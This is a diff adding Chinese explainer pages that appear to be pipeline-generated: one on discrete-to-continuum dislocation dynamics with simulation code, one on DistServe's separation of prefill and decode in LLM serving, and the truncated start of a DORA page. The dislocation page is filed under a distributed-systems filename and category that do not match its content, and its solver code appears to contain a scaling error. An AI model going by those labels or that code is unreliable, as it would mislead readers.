零样本条件 | 不支持 | 不支持 | 有限支持 | 全面支持 | + +## 实验数据 + +- **CIFAR-10**:FID = 52.0(低于 Gated PixelCNN 的 65.9,但高于 GLOW 的 46.0) +- **CelebA-HQ 64x64**:FID = 35.4 +- **FFHQ 64x64**:FID = 43.1 +- 模型参数量 93M,K=512, L=128 + +## 思考题 + +DDN 的核心思想是"每层同时生成 K 个候选,择优传递"。这和 Transformer 中的 beam search(束搜索)有相似之处——都是保留多个候选路径。但 DDN 是在像素空间直接操作,而 beam search 是在序列空间操作。你觉得这两种方法在"表示能力"上的根本区别是什么? diff --git a/src/content/docs/papers/distributed-snapshot-byzantine-2026.md b/src/content/docs/papers/distributed-snapshot-byzantine-2026.md new file mode 100644 index 000000000..e29f84164 --- /dev/null +++ b/src/content/docs/papers/distributed-snapshot-byzantine-2026.md @@ -0,0 +1,377 @@ +--- +title: 原子晶格上的位错动力学模拟——碰撞规则的影响 +来源: https://arxiv.org/abs/2605.30682 +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# 原子晶格上的位错动力学模拟——碰撞规则的影响 + +## 一、从"一群走路的人"说起 + +想象一条环形跑道,上面有一群人正在走动。每个人有两种身份:红色(正电荷)或蓝色(负电荷)。 + +- 同样颜色的人互相排斥——看到同色的人会绕着走 +- 不同颜色的人互相吸引——看到异色的人想靠近 +- 当两个不同颜色的人在同一个位置相遇时,他们会"抵消"——两个人一起消失 + +这听起来像什么?这正是这篇论文研究的**一维周期性晶格上位错(dislocation)的运动模型**。 + +位错是金属晶体中的线缺陷。它们的运动决定了金属的塑性和强度。每个位错携带一个拓扑荷(Burgers vector),取值为 +1 或 -1。当正负位错相遇时会相互湮灭,修复晶格。 + +这篇论文的核心问题是:**微观层面如何处理"碰撞",会如何影响宏观层面的演化规律?** + +## 二、两个模型:保存 vs 湮灭 + +作者提出了两种离散模型,唯一的区别就是碰撞规则: + +### 模型 A:`(P_n^csv)` — 碰撞后全部保存 + +- 位错碰撞时不做特殊处理 +- 即使两个位错在同一位置,它们仍然各自存在 +- 正负位错的总数都守恒 + +### 模型 B:`(P_n^ann)` — 碰撞后异号湮灭 + +- 当正负位错碰撞时,两者立即从系统中移除 +- 只有同号位错会继续存在 +- 净 Burgers 向量(正减负)守恒,但总数量减少 + +## 三、从微观到宏观:为什么这个问题重要 + +你可以把这个问题理解为"还原论"的一个具体例子: + +> 微观粒子的行为规则,如何决定宏观物质的演化方程? + +具体来说,作者想验证: + +| 离散模型 | 对应的连续 PDE 模型 | +|----------|---------------------| +| `(P_n^csv)` | Groma-Balogh 方程 `(P_∞^csv)` | +| `(P_n^ann)` | 带湮灭项的守恒律 `(P_∞^ann)` | + +如果离散模型确实收敛到对应的连续模型,我们就建立了"原子尺度"和"材料尺度"之间的数学桥梁。 + +## 四、核心概念详解 + +### 4.1 晶格与参数 + +考虑一个一维周期晶格 `Λ_ε = {0, ε, 2ε, ..., 1-ε}`,其中 `ε` 是晶格间距与宏观周期的比值。 + +三个关键参数: + +- **ε** — 晶格精细程度(越小越精细) +- **n** — 位错数量(越大密度越高) +- **β** — 相互作用能与热能之比(越大温度越低) + +渐近 regime 的要求:`n ≫ 1`, `1/ε ≫ 1`, `n ≪ 1/ε`(稀疏缩放), `β → ∞`(低温) + +### 4.2 跳跃速率公式 + +每个位错 `i` 可以向左或向右跳到相邻格点,速率由 Kramers 公式给出: + +``` +r_±,i(L) = (1 / (βε²)) × exp( ±½ βε F_i(L) ) +``` + +其中 `F_i(L)` 是作用在位错 `i` 上的合力,来自所有其他位错的弹性相互作用: + +``` +F_i(L) = (1/n) Σ_j b_i·b_j · f(L_i - L_j) +``` + +这里的 `f(x) = π / tan(πx)` 是 Volterra 公式的无量纲形式,描述了位错间的长程相互作用。 + +### 4.3 连续极限方程 + +**(P_∞^csv) — Groma-Balogh 方程:** + +``` +∂_t ρ⁺ = -∂ₓ(ρ⁺ · v[κ]) +∂_t ρ⁻ = +∂ₓ(ρ⁻ · v[κ]) +v[κ] = f * κ (卷积) +``` + +其中 `κ = ρ⁺ - ρ⁻` 是净 Burgers 向量密度。这是一个连续性方程组,`ρ⁺` 和 `ρ⁻` 各自守恒。 + +**(P_∞^ann) — 带湮灭的守恒律:** + +``` +∂_t κ = -∂ₓ(|κ| · v[κ]) +``` + +这里没有分别追踪 `ρ⁺` 和 `ρ⁻`,而是直接追踪净密度 `κ`。`|κ|` 项体现了湮灭效应——当正负位错共存时,它们的"绝对密度"大于"净密度",差值就是已经湮灭的部分。 + +## 五、代码示例 + +### 示例 1:离散位错系统的 Kinetic Monte Carlo 模拟 + +```python +import numpy as np + +class DislocationSystem: + """一维周期晶格上的位错系统""" + + def __init__(self, positions, signs, epsilon, beta, annihilate=True): + """ + positions: 位错在一维环上的位置 [0, 1) + signs: 每个位错的 Burgers 向量 (+1 或 -1) + epsilon: 晶格间距 + beta: 相互作用能/热能比 + annihilate: 是否启用碰撞湮灭规则 + """ + self.positions = np.array(positions, dtype=float) + self.signs = np.array(signs, dtype=int) + self.epsilon = epsilon + self.beta = beta + self.annihilate = annihilate + self.time = 0.0 + + def _force(self, i): + """计算作用在位错 i 上的合力""" + n = len(self.positions) + force = 0.0 + for j in range(n): + if i == j: + continue + dx = (self.positions[i] - self.positions[j]) % 1.0 + # Volterra 相互作用力 + if dx == 0.0: + dx = 0.5 # 碰撞时力为零 + force += self.signs[i] * self.signs[j] * np.pi / np.tan(np.pi * dx) + return force / n + + def _jump_rates(self): + """计算所有可能的跳跃速率""" + total_rate = 0.0 + rates = [] + n = len(self.positions) + for i in range(n): + fi = self._force(i) + for sign in [+1, -1]: + r = (1.0 / (self.beta * self.epsilon**2)) * np.exp( + 0.5 * self.beta * self.epsilon * sign * fi + ) + rates.append((i, sign, r)) + total_rate += r + return rates, total_rate + + def step(self): + """执行一步 Kinetic Monte Carlo 迭代""" + rates, total_rate = self._jump_rates() + if total_rate == 0: + return + + # 采样等待时间(指数分布) + dt = np.random.exponential(1.0 / total_rate) + self.time += dt + + # 采样选择哪个位跳、往哪跳 + probs = [r / total_rate for _, _, r in rates] + idx = np.random.choice(len(rates), p=probs) + i, direction, _ = rates[idx] + + # 执行跳跃 + old_pos = self.positions[i] + self.positions[i] = (old_pos + direction * self.epsilon) % 1.0 + + # 检查碰撞:如果有湮灭规则且遇到异号位错 + if self.annihilate: + collided = False + for j in range(len(self.positions)): + if i != j: + dist = abs(self.positions[i] - self.positions[j]) + if dist < self.epsilon or dist > (1.0 - self.epsilon): + if self.signs[j] == -self.signs[i]: + # 湮灭:移除两个位错 + self.positions = np.delete(self.positions, j) + self.signs = np.delete(self.signs, j) + self.positions = np.delete(self.positions, i if i < j else i - 1) + self.signs = np.delete(self.signs, i if i < j else i - 1) + collided = True + break + if collided: + return + + # 更新跳跃速率(增量更新,节省 O(n) 开销) + # 这里简化为完全重算 +``` + +### 示例 2:连续 PDE 的有限体积数值求解 + +```python +class PDVSolver: + """Groma-Balogh 方程的有限体积求解器""" + + def __init__(self, N, T_final, scheme='csv'): + """ + N: 空间网格数 + T_final: 模拟终止时间 + scheme: 'csv' (守恒) 或 'ann' (湮灭) + """ + self.N = N + self.dx = 1.0 / N + self.T_final = T_final + self.scheme = scheme + self.x = np.arange(N) * self.dx # 网格点 + self.dt = self.dx ** 2 # CFL 条件 + + def _velocity(self, kappa): + """计算速度场 v[kappa] = f * kappa(卷积)""" + v = np.zeros(self.N) + for i in range(self.N): + for j in range(self.N): + dx = (i - j) * self.dx + if abs(dx) < 1e-10 or abs(abs(dx) - 1.0) < 1e-10: + continue # 奇异点跳过 + mj = (j + 0.5) * self.dx # 单元中点 + d = ((i * self.dx) - mj) % 1.0 + v[i] += (np.pi / np.tan(np.pi * d)) * kappa[j] * self.dx + return v / self.N + + def solve_csv(self, rho_plus_0, rho_minus_0): + """求解 (P_∞^csv) — Groma-Balogh 方程""" + rho_plus = rho_plus_0.copy() + rho_minus = rho_minus_0.copy() + t = 0.0 + + while t < self.T_final: + kappa = rho_plus - rho_minus + v = self._velocity(kappa) + + # 迎风格式:根据速度方向选择上游值 + for i in range(self.N): + v_left = v[i] + v_right = v[(i + 1) % self.N] + + # rho⁺ 的通量 + if v_left >= 0: + rho_plus_at_left = rho_plus[(i - 1) % self.N] + else: + rho_plus_at_left = rho_plus[i] + + if v_right >= 0: + rho_plus_at_right = rho_plus[i] + else: + rho_plus_at_right = rho_plus[(i + 1) % self.N] + + # rho⁻ 类似 + if v_left >= 0: + rho_minus_at_left = rho_minus[(i - 1) % self.N] + else: + rho_minus_at_left = rho_minus[i] + + if v_right >= 0: + rho_minus_at_right = rho_minus[i] + else: + rho_minus_at_right = rho_minus[(i + 1) % self.N] + + # 更新密度 + rho_plus[i] -= (self.dt / self.dx) * ( + rho_plus_at_right * v_right - rho_plus_at_left * v_left + ) + rho_minus[i] += (self.dt / self.dx) * ( + rho_minus_at_right * v_right - rho_minus_at_left * v_left + ) + + t += self.dt + + return rho_plus, rho_minus + + def solve_ann(self, kappa_0): + """求解 (P_∞^ann) — 带湮灭的守恒律""" + kappa = kappa_0.copy() + t = 0.0 + + while t < self.T_final: + v = self._velocity(kappa) + + for i in range(self.N): + v_left = v[i] + v_right = v[(i + 1) % self.N] + + # |kappa| 的迎风取值 + if v_left >= 0: + abs_kappa_left = abs(kappa[(i - 1) % self.N]) + else: + abs_kappa_left = abs(kappa[i]) + + if v_right >= 0: + abs_kappa_right = abs(kappa[i]) + else: + abs_kappa_right = abs(kappa[(i + 1) % self.N]) + + kappa[i] -= (self.dt / self.dx) * ( + abs_kappa_right * v_right - abs_kappa_left * v_left + ) + + t += self.dt + + return kappa +``` + +## 六、主要发现 + +通过大量数值模拟,作者得到了以下关键结果: + +1. **带湮灭的模型收敛良好** — `(P_n^ann)` 随着 `n → ∞` 确实收敛到 `(P_∞^ann)`,即带湮灭项的连续 PDE。 + +2. **无湮灭模型的收敛不一致** — `(P_n^csv)` 的表现令人意外:在某些参数范围内它收敛到预期的守恒 PDE `(P_∞^csv)`,但在其他参数范围内,它反而表现出类似湮灭的行为,收敛到 `(P_∞^ann)` 的形式。 + +3. **碰撞规则至关重要** — 微观层面的碰撞处理方式(保存 vs 湮灭)会导致完全不同的宏观极限方程。这意味着在构建离散位错动力学模型时,不能忽略碰撞的细节。 + +## 七、直观理解:为什么两种模型表现不同? + +回到"跑步的人"的类比: + +- **保存模型**:红蓝两人擦肩而过,继续各跑各的。长期来看,红色和蓝色的"总量"都不变。 +- **湮灭模型**:红蓝两人相遇就一起消失。红色总量和蓝色总量都在减少,但"红色减蓝色"的差值保持不变。 + +关键发现是:**即使在"保存模型"中,如果参数设置不当,相同位置的异号位错会因为强烈的相互吸引而快速靠近、重叠,使得宏观密度看起来就像在"湮灭"一样。** 这不是真正的湮灭,而是模型参数导致的表观现象。 + +## 八、方法论要点 + +### 8.1 Kinetic Monte Carlo(动力学蒙特卡洛) + +这是模拟随机过程的标准方法: + +1. 计算所有可能事件的总速率 +2. 从指数分布采样等待时间 +3. 按概率选择下一个事件 +4. 更新状态,重复 + +### 8.2 有限体积法(Finite Volume Method) + +用于求解 PDE: + +1. 将空间划分为小单元 +2. 在每个单元上积分方程 +3. 用迎风格式近似边界通量 +4. 时间推进 + +### 8.3 离散到连续的量化收敛 + +作者设计了专门的指标来量化离散模拟结果与连续 PDE 解之间的差异,包括 L1 误差、密度剖面比较等。 + +## 九、总结与延伸思考 + +这篇论文的核心贡献不在于提出新模型,而在于**通过数值证据回答了"离散模型是否真的收敛到我们期望的连续方程"这一基本问题**。 + +几个值得深入思考的问题: + +1. **参数选择的敏感性** — `(P_n^csv)` 在不同参数下的不同行为,暗示了离散-连续极限可能存在"相变"式的转变。 + +2. **物理真实性** — `(P_n^ann)` 更接近真实金属中的位错行为(异号位错确实会湮灭),因此其对应的 `(P_∞^ann)` 可能是更好的宏观描述。 + +3. **计算效率** — 湮灭减少了粒子数量,但需要额外的碰撞检测逻辑;保存模型粒子数不变但可能出现数值奇异性。 + +4. **高维推广** — 本文是一维模型,实际金属中的位错是三维曲线。高维情况下的碰撞规则和收敛性问题更加复杂。 + +## 十、参考文献 + +- Hudson, T., Jantaraphum, A., & van Meurs, P. (2026). *Simulations of dislocation dynamics on an atomic lattice: the effect of collision rules*. arXiv:2605.30682. +- Groma, I., & Balogh, L. (1999). Dislocation density formulation for the theory of plasticity. *Acta Metallurgica*. +- Blesgen, T. (2010). On the continuum theory of moving dislocations. +- Voter, A. F. (2007). Introduction to the kinetic monte carlo method. *Computational Microscopy*. diff --git a/src/content/docs/papers/distserve-2024.md b/src/content/docs/papers/distserve-2024.md new file mode 100644 index 000000000..d5d140696 --- /dev/null +++ b/src/content/docs/papers/distserve-2024.md @@ -0,0 +1,347 @@ +--- +title: DistServe — Prefill/Decode 分离与 Goodput 优化 LLM 服务 +来源: https://arxiv.org/abs/2401.09670 +日期: 2026-06-13 +子分类: ML 系统 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:快餐店的「备餐台」与「出餐口」 + +想象一家连锁快餐店(GPU 集群)同时服务两类顾客: + +1. **Prefill(备餐)**:顾客一次点了一整份套餐(prompt 可能有几百个 token)。后厨要把所有食材**同时下锅**炒好第一盘菜(生成**第一个 token**),并把配方写进账本(**KV cache**)。这一步像**大锅爆炒**——火力要猛、灶台要大,顾客最关心「多久能上第一道菜」(**TTFT,Time-To-First-Token**)。 +2. **Decode(出餐)**:之后每来一位客人要**一勺汤**(每步只生成 1 个 token),厨师从账本翻旧料、加一小撮新料。火力不大,但要**不停翻账本、搬罐子**——吃显存带宽。顾客关心「每勺之间等多久」(**TPOT,Time-Per-Output-Token**),只要比人眼阅读快就行。 + +**传统 vLLM / Orca 式系统**把备餐和出餐**挤在同一口锅、同一批火**里炒(colocate + continuous batching): + +- 一锅大菜没炒完,旁边等一勺汤的人全得干等 → **Decode 的 TPOT 被 Prefill 拖慢**。 +- 为了照顾等汤的人,大菜也不能全力炒 → **Prefill 的 TTFT 被 Decode 拖慢**。 +- 更糟的是:备餐台和出餐口**共用同一套灶台编号和排班表**(资源与并行策略耦合)——给大锅菜配 4 个灶,出餐口也被迫 4 个灶,但出餐其实 1 个灶就够忙。 + +**DistServe 的做法**像把店拆成两个区域: + +- **一楼专门备餐**(Prefill GPU 集群),按 TTFT 目标单独配灶、单独排并行策略。 +- **二楼专门出餐**(Decode GPU 集群),按 TPOT 目标配灶;因为出餐 GPU 常常闲着,可以**多个一楼备餐台对应一个二楼出餐口**(例如 2:1 的 prefill:decode 实例比)。 +- 备餐完成后用**传送带**把账本(KV cache)送到二楼——在现代 NVLink 集群里,这笔搬运费往往**比互相挡锅便宜得多**。 + +一句话:**不是让 GPU「每秒吐更多 token」(吞吐),而是在 TTFT 和 TPOT 两个 SLO 都达标的前提下,让每张 GPU 能接更多单(Goodput)——DistServe 用 PD 分离把这件事做成可优化的系统问题。** + +--- + +## 是什么 + +**DistServe: Disaggregating Prefill and Decoding for Goodput-optimized Large Language Model Serving**(Zhong 等,**OSDI 2024**,arXiv:[2401.09670](https://arxiv.org/abs/2401.09670))提出: + +1. 把 LLM 推理的 **Prefill** 与 **Decode** 拆到**不同 GPU** 上,消除两阶段在同一 batch 里的**相互干扰**。 +2. 针对应用给定的 **TTFT / TPOT** 延迟约束,**分别**为两阶段做 GPU 数量与**模型并行策略**的联合优化,最大化 **per-GPU goodput**。 +3. 根据集群**网络带宽拓扑**,自动放置 prefill 实例与 decode 实例,最小化 KV cache 跨机传输开销。 + +| 项目 | 内容 | +|------|------| +| 会议 | OSDI 2024 | +| 机构 | 北京大学、StepFun、UC San Diego | +| 开源 | [github.com/LLMServe/DistServe](https://github.com/LLMServe/DistServe) | +| 对比基线 | vLLM、Orca 等 colocated 系统 | +| 效果 | 相同 SLO 下可多服务 **7.4×** 请求,或 SLO 收紧 **12.6×**;**>90%** 请求满足延迟约束 | + +--- + +## 为什么重要 + +不理解 DistServe,下面几件事很难讲清楚: + +- 为什么业界从 2024 年起大量出现 **PD 分离**(vLLM disagg、SGLang、Mooncake、Splitwise、Nexus 等)——DistServe 是这条线的**系统奠基论文之一**。 +- 为什么在线服务要同时盯 **TTFT** 和 **TPOT**,而不能只优化「tokens/s」——聊天机器人重 TTFT,文档摘要重 TPOT,**Goodput** 才反映「在 SLO 内每张卡能接多少 rps」。 +- 为什么 **Chunked Prefill** 能缓解但不能根治干扰——chunk 与 decode 混批仍会抢 SM/带宽,且长上下文下 KV 重复加载带来 **O(N²)** 访存开销。 +- 为什么 Prefill 更爱 **张量并行(intra-op)**、Decode 在高负载下更爱 **流水线并行(inter-op)**——两阶段算力形态不同,**耦合部署会迫使你 over-provision**。 + +--- + +## 核心概念 + +### 1. 两阶段推理与双指标延迟 + +```text +用户 prompt (n tokens) + → [Prefill] 并行处理全部 prompt token → 生成第 1 个 output token + 写入 KV cache + → [Decode] 循环:每步 1 token,读全量 KV + 权重 → 直到 EOS + +总延迟 ≈ TTFT + TPOT × (输出 token 数 - 1) +``` + +| 阶段 | 计算特征 | 典型瓶颈 | 用户关心的指标 | +|------|----------|----------|----------------| +| **Prefill** | 一次处理很多 token,大 GEMM | **Compute-bound**(长 prompt) | **TTFT** | +| **Decode** | 每步 1 token,仍要读全量权重+KV | **Memory-bandwidth-bound** | **TPOT** | + +### 2. Goodput vs Throughput + +| 指标 | 含义 | DistServe 优化目标 | +|------|------|-------------------| +| **Throughput** | 全系统每秒生成 token 总数 | 传统 colocated 系统常最大化它 | +| **Goodput** | 在 **SLO 达成率**(如 90%)下,**每张 GPU** 能承受的**最大请求速率** | DistServe 直接优化它 | + +论文 Figure 1 的例子:13B 模型在单张 A100 上,colocated 系统 goodput 约 **1.6 rps**;若 prefill、decode **各用一张独立 GPU**,prefill 可达 **5.6 rps**、decode 可达 **10 rps**。按 **2 张 prefill + 1 张 decode** 配比,整体 goodput 可达 **10 rps(≈3.3 rps/GPU)**,比 colocated **高约 2.1×**——还没算上 DistServe 的并行与放置优化。 + +### 3. Colocated 系统的三大痛点 + +#### 3.1 Prefill–Decode 干扰 + +同一 batch 里混入一个 prefill job,会让整批 decode 的迭代时间**显著变长**(论文 Figure 2:batch 越大、prompt 越长,拖慢越狠)。即便调度上「先 prefill 再 decode」,**排队延迟**仍会让另一阶段违约。 + +**Chunked Prefill + piggyback** 只能折中:chunk 太小则 prefill 吃不满 GPU;chunk 太大则 decode 插不进 batch;且分 chunk 后 KV 要反复从 HBM 加载,长上下文下访存从 **O(N)** 恶化到 **O(N²)**。 + +#### 3.2 资源与并行策略耦合 + +- Prefill:**算力密集**,为压 TTFT 适合 **intra-op 并行**(张量切分,需 NVLink 高带宽)。 +- Decode:batch 小时 GPU 利用率低;负载高时 **inter-op 流水线** 能线性扩吞吐、降排队(M/D/1 队列里执行时间越短,排队项越小)。 + +Colocated 时两阶段**被迫共用**同一套 GPU 数与 TP/PP 配置,往往只能 **over-provision** 才能同时满足 TTFT 和 TPOT。 + +#### 3.3 DistServe 的解:Disaggregation + +```text +Client + → Prefill Instance(s) — 完整模型副本,只跑 prefill + │ 传输 KV cache + 首 token 元数据 + ▼ + → Decode Instance(s) — 完整模型副本,只跑 decode + → stream tokens 回 Client +``` + +- **消除 batch 内干扰**:prefill batch 与 decode batch **物理隔离**。 +- **独立扩缩**:prefill:decode 实例数可非 1:1(decode 常更闲,可多配 prefill 实例)。 +- **独立并行**:例如 prefill 用 2-way TP,decode 用 4-stage PP——在分离架构下才「合法」。 + +### 4. 分阶段优化直觉(论文 §3) + +**Prefill 实例** + +- 存在临界输入长度 \(L_m\):超过后单请求即可**吃满** A100;再堆 batch 只会**等比例拉长**批处理时间。 +- 实际 prompt 常数百 token,prefill batch 一般**保持很小**。 +- 低到达率:intra-op 并行降执行时间 → 降 TTFT;高到达率:inter-op 流水线提高**服务率** → 降排队。 + +**Decode 实例** + +- 单步算力需求小,常**内存带宽受限**;增大 batch 可提高利用率,但会抬高 TPOT。 +- 优化目标是在 TPOT SLO 内尽量**塞满 batch**。 + +**跨阶段通信** + +- 主要传 **KV cache**(和少量元数据)。在现代 GPU 集群(NVLink / 高速 NIC)上,相对节省下来的干扰时间,通信开销**往往可接受**——DistServe 用**放置算法**让高带宽链路承担跨阶段流量。 + +### 5. DistServe 系统流程(论文 §4) + +```mermaid +flowchart TB + SLO[应用给出 TTFT / TPOT / SLO 达成率] + OPT[单副本:联合优化
GPU 数 + 并行策略
最大化 per-GPU goodput] + REP[按流量复制 prefill/decode 实例] + PLACE[带宽感知放置
最小化 KV 传输] + SLO --> OPT --> REP --> PLACE +``` + +给定 SLO 后,DistServe: + +1. 假设**单模型副本**,为 prefill、decode **分别**搜索最优 GPU 分配与张量/流水线并行组合。 +2. 按目标 QPS **水平复制**实例(prefill 与 decode 副本数可不同)。 +3. 根据集群拓扑把实例**映射到机器**,使跨阶段 KV 传输走**高带宽路径**。 + +实现上,DistServe 是叠在现有推理引擎(如 FasterTransformer)之上的**编排层**,不改模型数学。 + +--- + +## 代码示例 + +### 示例 1:用 Python 估算 TTFT / TPOT 与 Goodput 门槛 + +下面用简化模型理解:**Goodput 受 TTFT、TPOT 两个约束中更紧的那个限制**(与论文 Figure 1 思路一致)。 + +```python +from dataclasses import dataclass + +@dataclass +class Slo: + ttft_p90_ms: float # Prefill 延迟上限(毫秒) + tpot_p90_ms: float # 每输出 token 间隔上限(毫秒) + attainment: float = 0.90 # SLO 达成率目标 + +@dataclass +class PhaseProfile: + # 简化:到达率 R 下测得的 P90 延迟(真实系统用 profiling + 排队模型) + max_rps_at_slo: float + +def goodput_per_gpu(prefill: PhaseProfile, decode: PhaseProfile, + prefill_gpus: int, decode_gpus: int) -> float: + """分离部署:整体 rps 受两阶段瓶颈约束,再除以总 GPU 数""" + prefill_capacity = prefill.max_rps_at_slo * prefill_gpus + decode_capacity = decode.max_rps_at_slo * decode_gpus + overall_rps = min(prefill_capacity, decode_capacity) + total_gpus = prefill_gpus + decode_gpus + return overall_rps / total_gpus + +# 论文 Figure 1 量级(13B, A100 80GB, 输入 512 / 输出 64 的合成负载) +prefill_only = PhaseProfile(max_rps_at_slo=5.6) +decode_only = PhaseProfile(max_rps_at_slo=10.0) +colocated = 1.6 # rps / GPU + +pd_ratio_2_1 = goodput_per_gpu(prefill_only, decode_only, 2, 1) +print(f"Colocated goodput/GPU: {colocated:.2f} rps") +print(f"PD 2:1 disagg goodput/GPU: {pd_ratio_2_1:.2f} rps") +print(f"提升倍数: {pd_ratio_2_1 / colocated:.1f}x") +``` + +输出示意:`PD 2:1` 约 **3.3 rps/GPU**,相对 colocated **~2.1×**——尚未计入 DistServe 对并行策略的联合搜索,因此论文端到端还能更高。 + +### 示例 2:M/D/1 排队 —— 为什么 Prefill 要减执行时间 + +论文用 **M/D/1 队列**说明:到达率固定时,**执行时间 D 越短,排队延迟越小**,TTFT 改善**非线性**。 + +```python +def m_d_1_ttft(execution_time_s: float, arrival_rate: float) -> float: + """平均 TTFT = D + 排队项(服务时间确定、到达 Poisson)""" + util = arrival_rate * execution_time_s + if util >= 1.0: + return float("inf") # 系统不稳定 + queue = (arrival_rate * execution_time_s**2) / (2 * (1 - util)) + return execution_time_s + queue + +D = 0.12 # 单请求 prefill 执行 120ms(已吃满 GPU) +for rps in [2, 4, 5, 5.5]: + ttft = m_d_1_ttft(D, rps) * 1000 + print(f"到达 {rps} rps → 平均 TTFT ≈ {ttft:.0f} ms") + +# 若用 2-way 张量并行把 D 降到 0.07s: +D_fast = 0.07 +print("--- 加 intra-op 并行后 ---") +for rps in [5, 6, 7]: + ttft = m_d_1_ttft(D_fast, rps) * 1000 + print(f"到达 {rps} rps → 平均 TTFT ≈ {ttft:.0f} ms") +``` + +要点:**压执行时间**(算子并行、少无谓 batching)在负载升高时比「多塞几个请求进 batch」更有效——这是 DistServe 给 prefill 实例单独选 **intra-op** 的理论支撑。 + +### 示例 3:概念性 PD 分离调度伪代码 + +```python +from collections import deque +from enum import Enum, auto + +class Stage(Enum): + PREFILL = auto() + DECODE = auto() + +class DistServeScheduler: + """教学用骨架:prefill / decode 队列与实例分离""" + + def __init__(self, prefill_engines, decode_engines): + self.prefill_engines = prefill_engines # 各持一份完整权重 + self.decode_engines = decode_engines + self.wait_prefill = deque() + self.wait_decode = deque() + + def submit(self, request_id: str, prompt_tokens: list[int]): + self.wait_prefill.append((request_id, prompt_tokens)) + + def step_prefill(self): + if not self.wait_prefill: + return + engine = self._pick_idle(self.prefill_engines) + req_id, tokens = self.wait_prefill.popleft() + # 只跑 prefill:生成首 token + KV + first_token, kv_handle = engine.run_prefill(tokens) + # 经高带宽链路把 KV 交给 decode 池(放置算法决定目标机) + decode_engine = self._route_decode(kv_handle) + self.wait_decode.append((req_id, kv_handle, first_token, decode_engine)) + + def step_decode(self): + if not self.wait_decode: + return + req_id, kv, first_token, engine = self.wait_decode.popleft() + engine.attach_kv(req_id, kv, first_token) + # 之后由 decode 引擎逐步 generate;与 prefill 队列无 batch 交织 + + def _pick_idle(self, engines): + return min(engines, key=lambda e: e.queue_depth) + + def _route_decode(self, kv_handle): + # 论文 placement:选带宽最高、负载最低的 decode 实例 + return min(self.decode_engines, key=lambda e: e.expected_transfer_cost(kv_handle)) +``` + +真实 DistServe 还会在此之上做:**实例复制数、TP/PP 配置搜索、KV 传输批量化与流水线重叠**。 + +--- + +## 实践案例 + +### 案例 1:实时聊天(重 TTFT) + +用户发一句 200 token 的问题,期望 **<300ms** 看到第一个字;后续 token 只要 **<50ms** 间隔即可。 + +- Colocated:高峰时 prefill 与大量 decode 混批 → **TTFT P90 爆表**。 +- DistServe:prefill 专用 GPU + 小 batch + 可选 TP → TTFT 稳定;decode 池按 1:N 承接 KV。 + +### 案例 2:长文摘要(重 TPOT) + +输入 4k token,输出 512 token。Prefill 本身就很重,但用户更在意**整段生成速度**。 + +- 分离后 decode 池可用 **更大 batch** 换吞吐,只要 TPOT 仍低于阅读速度。 +- Prefill 侧避免无谓 multi-request batching(长序列已吃满 GPU)。 + +### 案例 3:与后续工作的关系 + +| 工作 | 与 DistServe 的关系 | +|------|---------------------| +| **vLLM + PagedAttention** | 解决 KV **怎么存**;DistServe 解决 prefill/decode **怎么摆** | +| **Mooncake (2024)** | 把 KV 当**分布式对象**调度;可视为 PD 分离 + 全局 KV 池 | +| **Nexus (2025)** | **单 GPU 内** SM 分区做 PD,避免双份权重;与 DistServe **跨 GPU** 路线互补 | +| **Chunked Prefill** | Colocated 上的缓解术;DistServe 主张**彻底拆开** | + +--- + +## 局限与代价 + +1. **双份(或多份)模型权重**:prefill 与 decode 实例各持完整副本 → **显存/内存成本上升**;适合「SLO 紧、GPU 贵」的生产场景,而非极简 demo。 +2. **跨机 KV 传输**:在弱网络或跨地域部署时,分离收益可能被通信吃掉;需要 DistServe 的**带宽感知放置**,或 Mooncake 类 KV 层。 +3. **调度复杂度**:要维护两套队列、实例比例、并行配置;运维与自动扩缩容比单体 vLLM 更难。 +4. **短 prompt / 低 QPS**:干扰不明显时,分离的固定成本可能不划算。 + +--- + +## 自测题 + +1. **TTFT** 和 **TPOT** 分别对应推理的哪个阶段?各对应什么典型硬件瓶颈? +2. 为什么「最大化 tokens/s」不等于「最大化 Goodput」? +3. 画一张图说明 colocated batching 如何同时恶化 TTFT 和 TPOT。 +4. 论文中 prefill 实例为何倾向 **小 batch + intra-op 并行**? +5. 若 2 个 prefill GPU 配 1 个 decode GPU,decode 侧 idle 较多,说明什么?应如何调比例? + +
+参考答案(先自己想) + +1. TTFT → Prefill,常 compute-bound;TPOT → Decode,常 memory-bandwidth-bound。 +2. Throughput 可牺牲尾部延迟换峰值 token 率;Goodput 要求在 SLO 达成率(如 90%)内能达到的最大请求率,直接关联成本与用户体验。 +3. 同一迭代中 prefill kernel 长、decode 短,decode 等 prefill;prefill batch 里掺 decode 也增加执行时间与资源争用。 +4. 长 prompt 单请求即可吃满 GPU;加 batch 只拉长批处理时间。intra-op 降单请求执行时间 D,按 M/D/1 显著降排队项。 +5. decode 为瓶颈或比例偏高;应增加 decode 实例、或减少 prefill 副本,使两阶段容量匹配目标流量。 + +
+ +--- + +## 延伸阅读 + +- 论文 PDF:[arXiv:2401.09670](https://arxiv.org/abs/2401.09670) / [USENIX OSDI 24](https://www.usenix.org/conference/osdi24/presentation/zhong-yinmin) +- 代码:[LLMServe/DistServe](https://github.com/LLMServe/DistServe) +- 前置:[PagedAttention 与 vLLM](./paged-attention-vllm.md)(KV 分页) +- 对照:[Nexus — 单 GPU 内 PD 分离](./nexus-prefill-decode-intra-gpu.md) +- 扩展:[Mooncake — 以 KV 为中心的分层缓存](./mooncake-kvcache-2024.md) + +--- + +## 一句话小结 + +**DistServe 把 LLM 服务从「一口锅炒到底」改成「备餐部 + 出餐部」:用 Prefill/Decode 物理分离消灭相互干扰,再按 TTFT/TPOT 双 SLO 分别调 GPU 与并行策略,最大化每张卡的 Goodput——在延迟约束比吞吐更重要的时代,这是比单纯加大 batch 更划算的杠杆。** diff --git a/src/content/docs/papers/dora-state-of-devops-2023.md b/src/content/docs/papers/dora-state-of-devops-2023.md new file mode 100644 index 000000000..131d837b0 --- /dev/null +++ b/src/content/docs/papers/dora-state-of-devops-2023.md @@ -0,0 +1,342 @@ +--- +title: DORA State of DevOps Report 2023 — 用「餐厅经营」读懂软件交付科学 +来源: https://services.google.com/fh/files/misc/2023_state_of_devops_report.pdf +日期: 2026-06-13 +分类: 其他 +子分类: 工程文化 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你经营一家**连锁餐厅**(这就是一家持续交付软件的公司): + +- **后厨**是开发团队:不断研发新菜、改配方、换供应商。 +- 